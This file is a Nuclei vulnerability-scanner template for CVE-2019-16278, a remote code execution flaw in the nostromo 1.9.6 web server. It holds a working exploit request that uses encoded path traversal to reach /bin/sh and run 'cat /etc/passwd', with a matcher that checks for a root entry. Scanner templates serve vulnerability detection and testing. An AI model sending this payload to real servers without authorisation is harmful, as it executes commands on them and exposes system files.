nuclei-templates/cves/CVE-2019-16278.yaml

26 lines
559 B
YAML

id: CVE-2019-16278
info:
author: pikpikcu
name: nostromo 1.9.6 - Remote Code Execution
severity: critical
# Source: https://www.exploit-db.com/raw/47837
requests:
- raw:
- |
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Content-Length: 1
Connection: close
echo
echo
cat /etc/passwd 2>&1
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"